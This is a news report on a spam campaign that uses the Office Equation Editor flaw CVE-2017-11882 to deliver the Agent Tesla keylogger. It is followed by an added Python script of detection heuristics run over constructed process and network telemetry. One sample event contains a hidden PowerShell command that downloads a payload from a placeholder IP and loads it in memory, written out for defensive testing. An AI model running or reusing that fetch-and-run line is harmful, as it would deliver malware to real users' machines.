Cybercriminals are leveraging a six-year-old vulnerability in Microsoft Office to distribute spyware via a complex email campaign. The attackers use malicious Excel attachments exploiting the remote code execution (RCE) flaw CVE-2017-11882, a memory-corruption bug in the Office Equation Editor component that Microsoft patched in November 2017, to deliver the spyware. Successful exploitation runs attacker code with the privileges of the user who opened the file, which can lead to full compromise of the system. The ultimate objective of the attack is to install Agent Tesla, a remote access Trojan (RAT) and advanced keylogger first identified in 2014, and to steal credentials and other data from compromised systems, exfiltrating them through a Telegram bot controlled by the attackers.
Although the vulnerability was patched years ago, unpatched or older Microsoft Office installations that are still in use remain susceptible to the attack. And although Agent Tesla is nearly a decade old, it remains a popular tool among cybercriminals because of features such as clipboard logging, keylogging, screen capture, and extraction of stored passwords from a range of web browsers.
The attack method stands out because it combines an old vulnerability with new complexity and evasion tactics, demonstrating the adaptability of the attackers' infection methods, 'making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape,' said Kaivalya Khursale, a senior security researcher at Zscaler.
The initial infection vector looks ordinary: socially engineered emails with business-themed lures. Once a user engages with the malicious email, however, the chain becomes less conventional. Opening the malicious Excel attachment in a version of Office that lacks the CVE-2017-11882 patch triggers the exploit, which contacts an attacker-controlled server that pushes additional files.
The attack then proceeds through several stages: download of a malicious JPG image file, execution of a PowerShell stage that decodes a DLL, and loading of malicious routines from that DLL. Agent Tesla ultimately sends the stolen data to a Telegram bot controlled by the attackers. Zscaler's blog post includes a comprehensive list of indicators of compromise (IoCs) that defenders can use to check whether a system has been affected.
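The chain above has several observable seams that do not depend on the campaign's specific hashes or domains: the Equation Editor process (EQNEDT32.EXE, the component patched for CVE-2017-11882) running or spawning a child at all, an Office application launching a script host, a PowerShell command line that references an image file and base64-decodes or reflectively loads it, and a non-browser process talking to the Telegram Bot API host. The following Python is an added example of those heuristics run over constructed process-creation and network events; it is not code from the article or from Zscaler. The field names imitate Sysmon-style telemetry (Image, ParentImage, CommandLine, DestinationHostname), the sample events, paths and IP address are made up, and the browser allowlist is an assumption to tune for your own estate.

```python
"""Detection heuristics for the Excel -> Equation Editor -> PowerShell -> Telegram chain.

Added example, not from the original article. Event shape mimics Sysmon-style
process-creation and network events; all sample events below are constructed.
"""
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# EQNEDT32.EXE is the Equation Editor component patched for CVE-2017-11882 and
# later removed from Office; in a patched estate it should not launch at all.
EQUATION_EDITOR = "eqnedt32.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
TELEGRAM_API = "api.telegram.org"          # Telegram Bot API endpoint host
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # assumed allowlist

# Image-file reference (URL or path) plus a decode / in-memory load primitive.
IMAGE_REF = re.compile(r"\.(?:jpe?g|png|gif|bmp)\b", re.I)
DECODE_OR_LOAD = re.compile(
    r"FromBase64String|Assembly\]::Load|Invoke-Expression|\biex\b", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def check_process(ev: dict) -> list:
    """Return the names of the rules a process-creation event triggers."""
    img = _base(ev.get("Image", ""))
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    findings = []
    if img == EQUATION_EDITOR:
        findings.append("equation_editor_started")
    if parent == EQUATION_EDITOR:
        # Equation Editor legitimately spawns nothing; a child means shellcode ran.
        findings.append("equation_editor_spawned_child")
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    if img in {"powershell.exe", "pwsh.exe"} and IMAGE_REF.search(cmd) \
            and DECODE_OR_LOAD.search(cmd):
        findings.append("powershell_decodes_image_payload")
    return findings


def check_network(ev: dict) -> list:
    """Flag Telegram Bot API traffic from anything that is not a browser."""
    img = _base(ev.get("Image", ""))
    host = ev.get("DestinationHostname", "").lower()
    if host == TELEGRAM_API and img not in BROWSERS:
        return ["non_browser_telegram_bot_api"]
    return []


def scan(events: list) -> dict:
    """Map event index -> triggered rules, omitting events with no findings."""
    hits = {}
    for i, ev in enumerate(events):
        rules = check_network(ev) if ev.get("EventType") == "network" else check_process(ev)
        if rules:
            hits[i] = rules
    return hits


# Constructed sample telemetry (not real campaign data). Note that Equation
# Editor is started via COM, so its parent is svchost.exe rather than Excel.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"EXCEL.EXE" C:\Users\victim\Downloads\Invoice_Q4.xls'},
    {"Image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": '"EQNEDT32.EXE" -Embedding'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": "powershell -nop -w hidden -c \"$b=(New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/img/photo.jpg');"
                    "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))\""},
    {"EventType": "network", "Image": r"C:\Users\victim\AppData\Roaming\updater.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
    {"EventType": "network", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "api.telegram.org", "DestinationPort": 443},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {_base(SAMPLE_EVENTS[idx]['Image'])} -> {rules}")
```

The first rule is the cheapest triage question: if EQNEDT32.EXE appears in process telemetry anywhere in a fleet that is supposedly patched, that host is either missing the 2017 fix or still carries the removed component, and the attachment that preceded it is worth pulling regardless of whether the rest of the chain fired.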